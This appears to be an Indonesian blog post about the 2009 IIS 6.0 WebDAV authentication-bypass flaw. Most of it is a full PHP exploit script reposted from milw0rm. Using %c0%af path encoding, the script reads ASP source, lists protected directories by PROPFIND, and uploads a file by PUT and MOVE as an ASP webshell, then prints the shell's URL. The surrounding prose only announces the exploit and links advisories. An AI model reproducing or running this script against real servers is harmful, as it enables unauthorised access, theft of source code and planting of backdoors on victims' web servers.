IIS 6 WEBDAV Exploit Code
Satu minggu setelah ditemukan bugs pada Windows Web Server IIS 6.0 yang terinstall webdav, kode eksploitasi (exploit code) untuk kelemahan tersebut direlease. Exploit code tersebut ditulis dalam script PHP. Selain bisa melihat isi dari file yang ada pada server juga memungkinkan penyerang untuk membuat file pada server korban (backdoor). Hal tersebut sudah dibuktikan oleh hacker asal perancis dalam blognya http://securiteweb.org/?p=117.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 | <? print_r(' ******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ******** Usage: php '.$argv[0].' source/path/put host path Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp Example2: php '.$argv[0].' path www.tian6.com /secret/ Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt) **************************************************************** '); //verification du debut if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;} else {$action=$argv[1];} if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;} else{$host=$argv[2];} if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;} else{$path=$argv[3];} //sent function sent($sock) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$sock); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); } if($action=="source"){ $position=strrpos($path,"/"); $path=substr_replace($path,"%c0%af/",$position,1); $sock="GET ".$path." HTTP/1.1\r\n"; $sock.="Translate: f\r\n"; $sock.="Host: ".$host."\r\n"; $sock.="Connection:close\r\n\r\n"; sent($sock); echo $html; die; } if($action=="path"){ $position=strrpos($path,"/"); $path=substr_replace($path,"%c0%af",$position,0); $sock="PROPFIND ".$path." HTTP/1.1\r\n"; $sock.="Host: ".$host."\r\n"; $sock.="Connection:close\r\n"; $sock.='Content-Type: text/xml; charset="utf-8"'."\r\n"; $sock.="Content-Length: 0\r\n\r\n"; $sock.='<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>'; sent($sock); $bur=explode("<a:href>",$html); foreach($bur as $line){$no=strpos($line,"<");$resultat.=substr($line,0,$no)."\n";} echo $resultat; die; } if($action=="put"){ echo "Remember,keep urfile in type txt!\r\n\r\n"; $fp = fopen("test.txt", 'r'); if($fp!=false){ while (false!==($char = fgets($fp))) { $fir1=$char; } fclose($fp); $position=strrpos($path,"/"); $path=substr_replace($path,"%c0%af",$position,0); $sock="PUT ".$path."test.txt HTTP/1.1\r\n"; $sock.="Host: ".$host."\r\n"; $sock.='Content-Type: text/xml; charset="utf-8"'."\r\n"; $sock.="Connection:close\r\n"; $sock.="Content-Length: ".strlen($fir1)."\r\n\r\n"; $sock.="".$fir1."\r\n"; echo $sock; sent($sock);sleep(2); $sock="MOVE ".$path."test.txt HTTP/1.1\r\n"; $sock.="Host: ".$host."\r\n"; $sock.="Connection:close\r\n"; $sock.="Destination: ".$path."racle.asp\n\n"; sent($sock); echo "Be cool,man! Webshell is http://".$host.$path."racle.asp"; die;} else{die;} } # milw0rm.com [2009-05-22] |
Informasi lebih lanjut silahkan kunjungi:
http://cenary.com/microsoft-mengeluarkan-security-advisory-971492-terkait-bugs-iis-60.html
http://cenary.com/microsoft-iis-60-webdav-remote-authentication-bypass.html
http://milw0rm.com/exploits/8765
Did you enjoy this post? Why not leave a comment below and continue the conversation, or subscribe to my feed and get articles like this delivered automatically to your feed reader.
[...] yang terpasang. Bahkan beberapa variant exploit tersedia untuk bugs IIS 6 tersebut, salah satunya http://cenary.com/iis-6-webdav-exploit-code.html. Saat ini Microsoft hanya memberikan langkah untuk mengurangi resiko keamanan tersebut [...]